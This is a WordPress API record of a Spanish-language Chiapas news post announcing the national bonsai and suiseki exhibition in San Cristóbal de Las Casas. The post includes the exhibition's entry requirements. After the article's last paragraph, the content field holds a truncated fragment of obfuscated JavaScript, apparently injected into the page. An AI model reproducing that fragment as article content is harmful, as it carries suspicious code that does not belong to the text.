{"id":17077,"date":"2024-08-07T01:31:40","date_gmt":"2024-08-07T01:31:40","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=17077"},"modified":"2024-08-07T01:31:41","modified_gmt":"2024-08-07T01:31:41","slug":"sclc-sera-sede-de-la-exposicion-nacional-de-bonsai-y-suiseki-mexicano","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=17077","title":{"rendered":"SCLC ser\u00e1 sede de la Exposici\u00f3n Nacional de Bons\u00e1i y Suiseki Mexicano"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"619\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/IMG-20240806-WA0015-1024x619.jpg\" alt=\"\" class=\"wp-image-17078\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/IMG-20240806-WA0015-1024x619.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/IMG-20240806-WA0015-300x181.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/IMG-20240806-WA0015-768x464.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/IMG-20240806-WA0015.jpg 1085w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Redacci\u00f3n.<\/p>\n\n\n\n<p>\u00d3scar G\u00f3mez\/ Corresponsal<br>6 de agosto del 2024. San Crist\u00f3bal de Las Casas.- Del 22 al 25 de agosto, el Centro Cultural de Los Altos, ubicado en el Ex convento de Santo Domingo de Guzm\u00e1n, acoger\u00e1 la Exposici\u00f3n Nacional de Bons\u00e1i y Suiseki Mexicano, un evento que reunir\u00e1 a artistas, profesionales y aficionados del arte del bons\u00e1i de todo el pa\u00eds.<br>El encuentro, organizado por la Uni\u00f3n de Bons\u00e1i y Suiseki Mexicano, ofrecer\u00e1 a los asistentes una oportunidad \u00fanica para admirar algunas de las mejores colecciones de bons\u00e1i y suiseki del pa\u00eds. Los organizadores han preparado un programa que incluye conferencias, demostraciones, stands de art\u00edculos especializados, y la entrega de reconocimientos a destacados exponentes de este arte. Adem\u00e1s, se contar\u00e1 con la presencia de invitados internacionales que compartir\u00e1n sus conocimientos y experiencias.<br>La convocatoria para participar en la exposici\u00f3n establece que los \u00e1rboles deben estar en perfecto estado de salud y no se aceptar\u00e1n ejemplares alambrados. Se exige, adem\u00e1s, que tanto el \u00e1rbol como el cubresuelo, la maceta, y la mesa est\u00e9n en \u00f3ptimas condiciones de limpieza, entre otros requisitos.<br>Es importante destacar que el bons\u00e1i es un \u00e1rbol en miniatura, trabajado y dise\u00f1ado a escala, que no pertenece a una especie enana, sino que es transformado en un paisaje natural a trav\u00e9s de t\u00e9cnicas precisas y cuidadosas.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Redacci\u00f3n. \u00d3scar G\u00f3mez\/ Corresponsal6 de agosto del 2024. San Crist\u00f3bal de Las Casas.- Del 22 al 25 de agosto, el Centro Cultural de Los Altos, ubicado en el Ex convento de Santo Domingo de Guzm\u00e1n, acoger\u00e1 la Exposici\u00f3n Nacional de Bons\u00e1i y Suiseki Mexicano, un evento que reunir\u00e1 a artistas, profesionales y aficionados del arte &hellip;<\/p>\n","protected":false},"author":2,"featured_media":17078,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-17077","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17077","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=17077"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17077\/revisions"}],"predecessor-version":[{"id":17079,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17077\/revisions\/17079"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/17078"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=17077"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=17077"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=17077"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}